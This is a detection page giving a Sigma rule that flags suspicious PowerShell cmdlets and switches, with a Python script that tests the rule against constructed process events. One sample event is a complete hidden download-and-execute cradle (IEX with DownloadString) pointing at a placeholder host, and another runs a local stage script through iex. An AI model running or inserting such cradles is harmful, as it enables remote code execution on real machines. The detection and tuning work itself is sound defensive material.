Suspicious PowerShell Cmdlets

Many of our PowerShell detection analytics look for cmdlets, methods, and switches that may indicate malicious activity. The following analytic is by no means exhaustive but offers a few valuable examples of suspicious cmdlets and other oft-abused features to look out for. Part of the RedCanary 2024 Threat Detection Report.

Sigma rule

```yaml
title: Suspicious PowerShell Cmdlets
id: 33a86fea-add2-42b3-bccb-96285c619933
status: experimental
description: |
    Many of our PowerShell detection analytics look for cmdlets, methods, and
    switches that may indicate malicious activity. The following analytic is
    by no means exhaustive but offers a few valuable examples of suspicious
    cmdlets and other oft-abused features to look out for. Part of the
    RedCanary 2024 Threat Detection Report.
references:
    - https://redcanary.com/threat-detection-report/techniques/powershell/
author: RedCanary, Sigma formatting by Micah Babinski
date: 2024/03/21
tags:
    - attack.execution
    - attack.t1059
    - attack.t1059.001
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\powershell.exe'
        CommandLine|contains:
            - '-nop'
            - '-noni'
            - '-invoke-expression'
            - 'iex'
            - '.downloadstring'
            - 'downloadfile'
    condition: selection
falsepositives:
    - Unknown
level: low
```
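To see what the `selection` block above actually matches, the following Python script is an added example (it is not part of this page, the Red Canary report, or the Sigma project) that transcribes the rule's `Image|endswith` and `CommandLine|contains` logic and runs it over a handful of constructed `process_creation` events. It assumes events arrive as dictionaries with `Image` and `CommandLine` keys and applies Sigma's default case-insensitive string matching; every sample command line and path below is made up for illustration.

```python
from typing import Dict, List

# Selection logic transcribed from the Sigma rule on this page.
IMAGE_SUFFIX = "\\powershell.exe"
COMMANDLINE_TERMS = [
    "-nop",
    "-noni",
    "-invoke-expression",
    "iex",
    ".downloadstring",
    "downloadfile",
]


def matched_terms(event: Dict[str, str]) -> List[str]:
    """Evaluate the rule's `selection` against one process_creation event.

    Returns the CommandLine terms that matched, or an empty list when the
    event does not match. Sigma's `endswith` and `contains` modifiers are
    case-insensitive by default, so both fields are lower-cased first.
    """
    image = event.get("Image", "").lower()
    cmdline = event.get("CommandLine", "").lower()
    if not image.endswith(IMAGE_SUFFIX):
        return []
    return [term for term in COMMANDLINE_TERMS if term in cmdline]


def run_rule(events: List[Dict[str, str]]) -> List[int]:
    """Return the indices of events that satisfy `condition: selection`."""
    return [i for i, ev in enumerate(events) if matched_terms(ev)]


# Constructed sample events (not real telemetry; URLs and paths are placeholders).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    # 0: the download-cradle shape the rule's terms are written for
    {"Image": PS,
     "CommandLine": "powershell.exe -NoP -NonI -W Hidden -c \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://example.invalid/p.ps1')\""},
    # 1: routine administrative use, no suspicious terms
    {"Image": PS, "CommandLine": r"powershell.exe -File C:\Scripts\Backup.ps1"},
    # 2: matching text in a non-PowerShell process is ignored by the Image check
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c echo downloadfile >> C:\\temp\\log.txt"},
    # 3: PowerShell 7 runs as pwsh.exe, which the '\powershell.exe' suffix does not cover
    {"Image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "CommandLine": "pwsh.exe -nop -c \"iex (Get-Content .\\stage.ps1 -Raw)\""},
    # 4: plain substring matching: 'iex' inside an unrelated path still fires
    {"Image": PS,
     "CommandLine": r"powershell.exe -Command Import-Csv C:\Data\KpiExport\report.csv"},
    # 5: the rule lists '-invoke-expression' with a leading dash, so the bare
    #    cmdlet name on its own does not match any term
    {"Image": PS,
     "CommandLine": "powershell.exe -Command \"Invoke-Expression (Get-Content .\\setup.ps1 -Raw)\""},
]

if __name__ == "__main__":
    for i in run_rule(SAMPLE_EVENTS):
        print(f"event {i}: matched {matched_terms(SAMPLE_EVENTS[i])}")
```

Events 0 and 4 fire; the others do not. Event 4 shows why `falsepositives` is marked `Unknown`: `iex` is a three-character substring that can appear inside an ordinary file or share name, so alerts on this rule are best triaged together with the rest of the command line rather than treated as conclusive on their own. Events 3 and 5 show two gaps worth knowing about when tuning: `pwsh.exe` is outside the `Image` filter, and a spelled-out `Invoke-Expression` is only caught if one of the other terms happens to be present.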
